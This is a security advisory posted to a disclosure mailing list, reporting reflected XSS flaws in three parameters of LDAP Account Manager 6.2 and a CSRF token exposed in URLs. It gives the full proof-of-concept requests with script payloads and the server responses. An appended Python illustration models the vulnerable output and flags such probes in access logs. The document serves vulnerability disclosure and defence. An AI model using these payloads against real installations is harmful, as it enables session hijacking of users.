Message-ID: <CAOON2DGz28Rt1B1kGP++tPUjorKqQON_dxtqbpeCRUiexM9Fjg@mail.gmail.com>
Date: Wed, 21 Mar 2018 12:19:56 +0100
From: Michał Kędzior <michal.kedzior1478@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] LDAP Account Manager (6.2) CVE-2018-8763, CVE-2018-8764

Affected Software: LDAP Account Manager (6.2)
Pentester: Michał Kędzior <michal[dot]kedzior147[at]gmail[dot]com>
CVE: CVE-2018-8763, CVE-2018-8764

Vulnerabilities:
*****************

1. Cross-site scripting (reflected) CVE-2018-8763:
================================

Risk: HIGH

Summary:
***********
A reflected Cross-Site Scripting vulnerability was found during the test. It allows JavaScript code to be injected and executed in the application context. The JavaScript code is only reflected by the server, which differs from Stored Cross-Site Scripting, where the code is stored in the application permanently. This vulnerability is mostly exploited in order to hijack authenticated users' sessions. It can also be used to redirect users to malicious websites or to steal application users' keystrokes.

Proof:
*******

I. Vulnerable parameter dn:
=====================

Request with payload [%3cscript%3ealert(document.domain)%3c%2fscript%3e]:

GET /lam/templates/3rdParty/pla/htdocs/cmd.php?cmd=add_attr_form&server_id=1&dn=cn%3xxxxx%2cou%3dpeople%2cdc%3dpl%2cdc%3ds2-eu%2cdc%3dxxxx%2cdc%3dlocalru0bz%3cscript%3ealert(document.domain)%3c%2fscript%3eu89iu HTTP/1.1
Host: XXXXXXXXXX
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: XXXXXXXXX
Cookie: XXXXXXXXXX

Response with execution point [<script>alert(document.domain)</script>]:

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Length: 12887
Content-Security-Policy: frame-ancestors 'self'
Content-Type: text/html; charset="UTF-8"
Date: Fri, 02 Mar 2018 09:52:18 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.29 (Debian)
Vary: Accept-Encoding
X-Frame-Options: sameorigin
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="auto">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>LDAP Account Manager (6.2) - </title><link rel="shortcut icon" href="images/favicon.ico" type="image/vnd.microsoft.icon" /><link type="text/css" rel="stylesheet" href="css/default/style.css" /><link type="text/css" rel="stylesheet" media="all" href="js/jscalendar/calendar-blue.css" title="blue" />
<script type="text/javascript" src="js/ajax_functions.js"></script><script type="text/javascript" src="js/jscalendar/calendar.js"></script>
</head>
[…]
</div></td><td class="body" style="width: 80%;"><div id="ajBODY">
<table class="sysmsg"><tr><td class="icon" rowspan="2"><img src="images/default/error-big.png" alt="error" /></td><td class="head">Error</td></tr><tr><td class="body">The entry (cn=xxxxx,ou=people,dc=pl,dc=s2-eu,dc=xxxx,dc=localru0bz<script>alert(document.domain)</script>u89iu) does not exist.</td></tr></table>
<table class="body"><tr><td></td></tr></table></div></td></tr>
</table></body></html>

II. Vulnerable parameter template:
========================

Request with payload [%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e]:

GET /lam/templates/3rdParty/pla/htdocs/cmd.php?cmd=rename_form&server_id=1&dn=cn%3Dtechnic%2Cou%3Dpeople%2Cdc%3Dpl%2Cdc%3Ds2-eu%2Cdc%3Dxxxx%2Cdc%3Dlocal&template=noneuaax6%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ev7rfn HTTP/1.1
Host: xxxxxxx
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Response with execution point ["><script>alert(document.domain)</script>]:

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Length: 22141
Content-Security-Policy: frame-ancestors 'self'
Content-Type: text/html; charset="UTF-8"
Date: Fri, 02 Mar 2018 11:22:27 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.29 (Debian)
Vary: Accept-Encoding
X-Frame-Options: sameorigin
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="auto">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>LDAP Account Manager (6.2) - cn=technic,ou=people,dc=pl,dc=s2-eu,dc=xxxx,dc=local</title><link rel="shortcut icon" href="images/favicon.ico" type="image/vnd.microsoft.icon" /><link type="text/css" rel="stylesheet" href="css/default/style.css" /><link type="text/css" rel="stylesheet" media="all" href="js/jscalendar/calendar-blue.css" title="blue" />
<script type="text/javascript" src="js/ajax_functions.js"></script><script type="text/javascript" src="js/jscalendar/calendar.js"></script>
</head>
[…]
</div></td><td class="body" style="width: 80%;"><div id="ajBODY">
<table class="body"><tr><td><h3 class="title">Rename <b>cn=technic</b></h3><h3 class="subtitle">DN: <b>cn=technic,ou=people,dc=pl,dc=s2-eu,dc=xxx,dc=local</b></h3><center>Rename <b>cn=technic</b> to a new object.<br /><br /><form action="cmd.php?cmd=rename" method="post" /><input type="hidden" name="server_id" value="1" /><input type="hidden" name="dn" value="cn%3Dtechnic%2Cou%3Dpeople%2Cdc%3Dpl%2Cdc%3Ds2-eu%2Cdc%3Dxxxx%2Cdc%3Dlocal" /><input type="hidden" name="template" value="noneuaax6"><script>alert(document.domain)</script>v7rfn" /><input type="text" name="new_rdn" size="30" value="cn=technic" /><input type="submit" value="Rename" /></form></center>
</td></tr></table></div></td></tr>
</table></body></html>

III. Vulnerable parameter type:
=====================

Request with payload [%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e]:

GET /lam/templates/upload/masscreate.php?type=userawvpj%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ev0car HTTP/1.1
Host: xxxxx
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: xxxxxx
Cookie: xxxxxx

Response with execution point ["><script>alert(document.domain)</script>]:

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Length: 8418
Content-Security-Policy: frame-ancestors 'self'
Content-Type: text/html; charset=UTF-8
Date: Fri, 02 Mar 2018 11:10:05 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.29 (Debian)
Vary: Accept-Encoding
X-Frame-Options: sameorigin
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache"><link rel="shortcut icon" type="image/x-icon" href="../../graphics/favicon.ico">
<link rel="icon" href="../../graphics/logo136.png">
<title>LDAP Account Manager (directoryservice:389)</title>
[…]
<div class="userawvpj"><script>alert(document.domain)</script>v0car-bright smallPaddingContent"><div class="title">
<h2 class="titleText">Account creation via file upload</h2>
</div><p> </p>
<p> Here you can create multiple accounts by providing a CSV file.</p>
<p> </p>
<form enctype="multipart/form-data" action="masscreate.php" method="post">
<table>
<tr>
<td >
<div class="nowrap">Account type</div>
</td>
<td>
<select class="ui-corner-all" name="type" id="type" size="1" onchange="changeVisibleModules(this);" tabindex="1">
<option value="group">Groups</option>
<option value="user">Users</option>
</select>
</td>
[…]

Remediation:
***************
These vulnerabilities have been fixed by the vendor in version 6.3.

2. CSRF token in URL CVE-2018-8764
=================

Risk: LOW

Summary:
************
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Proof:
*******

Request which reveals the CSRF token [sec_token=1045368361844]:

GET /lam/templates/misc/ajax.php?function=passwordChange&sec_token=1045368361844 HTTP/1.1
Host: xxxx
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: xxxxx
Cookie: xxxxxx

Remediation:
***************
This vulnerability has been fixed by the vendor in version 6.3.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
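The following Python is an added illustration for both findings above; it is not part of the advisory and not LDAP Account Manager's own code. It reconstructs the two sinks from section 1 (a dn value echoed into an element body, a template value echoed into an attribute) as hypothetical functions with an escape switch, and runs a small access-log triage over constructed log lines modelled on the advisory's requests, flagging the sec_token-in-URL pattern from section 2 and the percent-encoded script probe in a query parameter. The render functions, regexes and log lines are assumptions for illustration.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical stand-ins for the two sinks seen in the advisory responses.
def render_error(dn: str, escape: bool) -> str:
    """Error page echoing the dn parameter into an element body (6.2: escape=False)."""
    value = html.escape(dn) if escape else dn
    return f'<td class="body">The entry ({value}) does not exist.</td>'

def render_hidden_input(template: str, escape: bool) -> str:
    """Hidden form field echoing the template parameter into an attribute value."""
    # quote=True also encodes " so the payload cannot close the attribute early.
    value = html.escape(template, quote=True) if escape else template
    return f'<input type="hidden" name="template" value="{value}" />'

def script_survives(markup: str) -> bool:
    """True if a raw <script> tag is left in the rendered markup."""
    return "<script>" in markup.lower()

# Access-log triage for the two patterns reported in the advisory.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TOKEN_PARAMS = ("sec_token",)          # anti-CSRF token name from section 2
SCRIPT_RE = re.compile(r"<\s*script", re.I)

def triage_request(line: str) -> list:
    """Return findings for one Apache combined-format log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    findings = [f"token-in-url:{n}" for n in TOKEN_PARAMS if n in query]
    for name, values in query.items():
        # parse_qs already decoded once; unquote again to catch double encoding.
        if any(SCRIPT_RE.search(unquote(v)) for v in values):
            findings.append(f"xss-probe:{name}")
    return findings

# Constructed log lines modelled on the advisory's requests (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Mar/2018:09:52:18 +0000] "GET /lam/templates/3rdParty/pla/htdocs/'
    'cmd.php?cmd=add_attr_form&server_id=1&dn=cn%3dx%3cscript%3ealert(document.domain)'
    '%3c%2fscript%3e HTTP/1.1" 200 12887',
    '10.0.0.5 - - [02/Mar/2018:11:30:00 +0000] "GET /lam/templates/misc/ajax.php?'
    'function=passwordChange&sec_token=1045368361844 HTTP/1.1" 200 512',
    '10.0.0.5 - - [02/Mar/2018:11:31:00 +0000] "GET /lam/templates/login.php HTTP/1.1" 200 4096',
]
```

Running triage_request over SAMPLE_LOG yields one xss-probe finding for dn, one token-in-url finding for sec_token, and nothing for the plain login request; the escaped renderers leave no raw script tag for either payload.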